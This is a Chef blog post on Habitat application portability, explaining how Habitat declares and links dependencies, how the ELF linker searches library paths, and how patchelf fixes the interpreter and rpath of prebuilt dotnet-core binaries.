Chef fixes this right? Kind of…it's complicated.

You can absolutely have Chef make sure that your application's dependencies are installed with the correct versions. But what if you have different applications or services on the same node that depend on a different version of the same dependency? It may not be possible to have multiple versions coexist in /usr/lib. Maybe your new version will work or maybe it won't. Especially for some of the lower level dependencies, there is simply no guarantee that compatible versions will exist. If anything, there is one guarantee: different distros will have different versions.

Keeping the automation with the application

Even more important – you want these dependencies to travel with your application. Ideally I want to install my application and know by virtue of installing it, everything it needs is there and has not stomped over the dependencies of anything else. I do not want to delegate the installation of its dependencies and the knowledge of which version to install to a separate management layer. Instead, Habitat binds dependencies with the application so that there is no question what your application needs and installing your application includes the installation of all of its dependencies. Lets look at how this works and see how dynamic linking is at play.

When you build a habitat plan, your plan will specify each dependency required by your application in your application's plan:

pkg_deps=(core/glibc core/gcc-libs core/libsodium)

Then when Habitat packages your build into its final, deployable artifact (.hart file), that artifact will include a list of every dependent Habitat package (including the exact version and release):

[35][default:/src:0]# cat /hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/DEPS  core/glibc/2.22/20160612063629  core/gcc-libs/5.2.0/20161208223920  core/libsodium/1.0.8/20161214075415

At install time, Habitat installs your application package and also the packages included in its dependency manifest (the DEPS file shown above) in the pkgs folder under Habitat's root location. Here it will not conflict with any previously installed binaries on the node that might live in /usr. Further, the Habitat build process links your application to these exact package dependencies and ensures that at runtime, these are the exact binaries your application will load.

[36][default:/src:0]# ldd /hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/lib/libzmq.so.5  linux-vdso.so.1 (0x00007fffd173c000)  libsodium.so.18 => /hab/pkgs/core/libsodium/1.0.8/20161214075415/lib/libsodium.so.18 (0x00007f8f47ea4000)  librt.so.1 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/librt.so.1 (0x00007f8f47c9c000)  libpthread.so.0 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libpthread.so.0 (0x00007f8f47a7e000)  libstdc++.so.6 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libstdc++.so.6 (0x00007f8f47704000)  libm.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libm.so.6 (0x00007f8f47406000)  libc.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libc.so.6 (0x00007f8f47061000)  libgcc_s.so.1 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libgcc_s.so.1 (0x00007f8f46e4b000)  /hab/pkgs/core/glibc/2.22/20160612063629/lib64/ld-linux-x86-64.so.2 (0x0000560174705000)

Habitat guarantees that the same binaries that were linked at build time, will be linked at run time. Even better, it just happens and you don't need a separate management layer to enforce this.

This is how a Habitat package provides portability. Installing and running a Habitat package brings all of its dependencies with it. They do not all live in the same .hart package, but your application's .hart package includes the necessary metadata to let Habitat know what other packages to download and install from the depot. These dependencies may or may not already exist on the node with varying versions, but it doesn't matter because a Habitat application only relies on the packages that reside within Habitat. And even within the Habitat environment, you can have multiple applications that rely on the same dependency but different versions, and these applications can run side by side.

The challenge of portability and the Habitat studio

So when you are building a Habitat plan into a hart package, what keeps that build from pulling dependencies from the default Linux lib directories? What if you do not specify these dependencies in your plan and the build links them from elsewhere? That could break our portability. If your application builds magically from a non-Habitat controlled location, then there is no guarantee that those dependencies will land when you install your application elsewhere. Habitat constructs a build environment called a "studio" to protect against this exact scenario.

The Habitat studio is a clean room environment. The only libraries you will find in this environment are those managed by Habitat. You will find /lib and /usr/lib totally empty here:

[37][default:/src:0]# ls /lib -la  total 8  drwxr-xr-x  2 root root 4096 Dec 24 22:46 .  drwxr-xr-x 26 root root 4096 Dec 24 22:46 ..  lrwxrwxrwx  1 root root    3 Dec 24 22:46 lib -> lib  [38][default:/src:0]# ls /usr/lib -la  total 8  drwxr-xr-x 2 root root 4096 Dec 24 22:46 .  drwxr-xr-x 9 root root 4096 Dec 24 22:46 ..  lrwxrwxrwx 1 root root    3 Dec 24 22:46 lib -> lib

Habitat installs several packages into the studio including several familiar Linux utilities and build tools. Every utility and library that Habitat loads into the studio is a Habitat package itself.

[1][default:/src:0]# ls /hab/pkgs/core/  acl       cacerts    gawk      gzip            libbsd         mg       readline    vim  attr      coreutils  gcc-libs  hab             libcap         mpfr     sed         wget bash      diffutils  glibc     hab-backline    libidn         ncurses  tar         xz  binutils  file       gmp       hab-plan-build  linux-headers  openssl  unzip       zlib bzip2     findutils  grep      less            make           pcre     util-linux  

This can be a double edged sword. On the one hand it protects us from undeclared dependencies being missed by our package. The darker side is that your plan may be building source that has build scripts that expect dependencies or other build tools to exist in their "usual" homes. If you are unfamiliar with how the standard Linux linker scans for dependencies, discovering what is wrong with your build may be less than obvious.

The rules of dependency scanning

So before we go any further lets take a look at how the linker works and how Habitat configures its build environment to influence where it finds dependencies at both build and run time. The linker looks at a combination of environment variables, cli options and well known directory paths and in a strict order of precedence. Here is a direct quote from the ld (the linker binary) man page:

The linker uses the following search paths to locate required shared libraries:

1. Any directories specified by -rpath-link options.
2. Any directories specified by -rpath options.  The difference between -rpath and -rpath-link is that directories specified by -rpath options are included in the executable and used at runtime, whereas the -rpath-link option is only effective at link time. Searching -rpath in this way is only supported by native linkers and cross linkers which have been configured with the –with-sysroot option.
3. On an ELF system, for native linkers, if the -rpath and -rpath-link options were not used, search the contents of the environment variable "LD_RUN_PATH".
4. On SunOS, if the -rpath option was not used, search any directories specified using -L options.
5. For a native linker, search the contents of the environment variable "LD_LIBRARY_PATH".
6. For a native ELF linker, the directories in "DT_RUNPATH" or "DT_RPATH" of a shared library are searched for shared libraries needed by it. The "DT_RPATH" entries are ignored if "DT_RUNPATH" entries exist.
7. The default directories, normally /lib and /usr/lib.
8. For a native linker on an ELF system, if the file /etc/ld.so.conf exists, the list of directories found in that file.

At build time Habitat sets the $LD_RUN_PATH variable to the library path of every dependency that the building plan depends on. We can see this in Habitat's build output when we build a Habitat plan:

zeromq: Setting LD_RUN_PATH=/hab/pkgs/mwrock/zeromq/4.1.4/20161225135834/lib:/hab/pkgs/core/glibc/2.22/20160612063629/lib:/hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib:/hab/pkgs/core/libsodium/1.0.8/20161214075415/lib

This means that at run time, when you run your application built by habitat, it will load from the "habetized" packaged dependencies. This is because setting the $LD_RUN_PATH influences how the ELF metadata is constructed and causes it to point to these Habitat package paths.

Patching pre-built binaries

Habitat not only allows one to build packages from source but also supports "binary-only" packages. These are packages that are made up of binaries downloaded from some external binary repository or distribution site. These are ideal for closed-source software or software that may be too complicated or takes too long to build. However, Habitat cannot control the linking process for these binaries. If you try to execute these binaries in a Habitat studio, you may see runtime failures.

The dotnet-core package is a good example of this. I ended up giving up on building that plan from source and instead just download the binaries from the public .NET distribution site. Running ldd on the dotnet binary, we see:

[8][default:/src:0]# ldd /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet  /hab/pkgs/core/glibc/2.22/20160612063629/bin/ldd: line 117:  /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet:  No such file or directory

Well that's not very clear. This isn't even able to show us any of the linked dependencies because the glibc interpreter the ELF metadata says to use is not where the metadata says it is:

[9][default:/src:1]# file /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet  /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225145648/bin/dotnet:  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked,  interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32,  BuildID[sha1]=db256f0ac90cd718d8ec2d157b29437ea8bcb37f, not stripped

/lib64/ld-linux-x86-64.so.2 does not exist . We can manually fix this even after a binary is built with a tool called patchelf. We will declare a build dependency in our plan to core/patchelf and then we can use the following command:

find -type f -name 'dotnet' \    -exec patchelf --interpreter "$(pkg_path_for glibc)/lib/ld-linux-x86-64.so.2"

Now lets try ldd again:

[16][default:/src:130]# ldd /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225151837/bin/dotnet  linux-vdso.so.1 (0x00007ffe421eb000)  libdl.so.2 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libdl.so.2 (0x00007fcb0b2cc000)  libpthread.so.0 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libpthread.so.0 (0x00007fcb0b0af000)  libstdc++.so.6 => not found  libm.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libm.so.6 (0x00007fcb0adb1000)  libgcc_s.so.1 => not found  libc.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libc.so.6 (0x00007fcb0aa0d000)  /hab/pkgs/core/glibc/2.22/20160612063629/lib/ld-linux-x86-64.so.2 (0x00007fcb0b4d0000)

This is better. It now links our glibc dependencies to the Habitat packaged glibc binaries, but there are still a couple dependencies that the linker could not find. At least now we can see more clearly what they are.

There is another argument we can pass to patchelf –set-rpath that can edit the ELF metadata as if $LD_RUN_PATH was set when the binary was built:

find -type f -name 'dotnet' \    -exec patchelf --interpreter "$(pkg_path_for glibc)/lib/ld-linux-x86-64.so.2" --set-rpath "$LD_RUN_PATH" {} \;  find -type f -name '*.so*' \    -exec patchelf --set-rpath "$LD_RUN_PATH" {} \;

So we set the rpath to the $LD_RUN_PATH set in the Habitat environment. We will also make sure to do this for each *.so file in the directory where we downloaded the distributable binaries. Finally ldd now finds all of our dependencies:

[19][default:/src:130]# ldd /hab/pkgs/mwrock/dotnet-core/1.0.0-preview3-003930/20161225152801/bin/dotnet  linux-vdso.so.1 (0x00007fff3e9a4000)  libdl.so.2 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libdl.so.2 (0x00007f1e68834000)  libpthread.so.0 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libpthread.so.0 (0x00007f1e68617000)  libstdc++.so.6 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libstdc++.so.6 (0x00007f1e6829d000)  libm.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libm.so.6 (0x00007f1e67f9f000)  libgcc_s.so.1 => /hab/pkgs/core/gcc-libs/5.2.0/20161208223920/lib/libgcc_s.so.1 (0x00007f1e67d89000)  libc.so.6 => /hab/pkgs/core/glibc/2.22/20160612063629/lib/libc.so.6 (0x00007f1e679e5000)  /hab/pkgs/core/glibc/2.22/20160612063629/lib/ld-linux-x86-64.so.2 (0x00007f1e68a38000)

Every dependency is a Habitat packaged binary as declared in our own application's (dotnet-core here) dependencies as low level as glibc. This should be fully portable across any 64 bit Linix distribution.

The post Habitat application portability and understanding dynamic linking of ELF binaries appeared first on Chef Blog.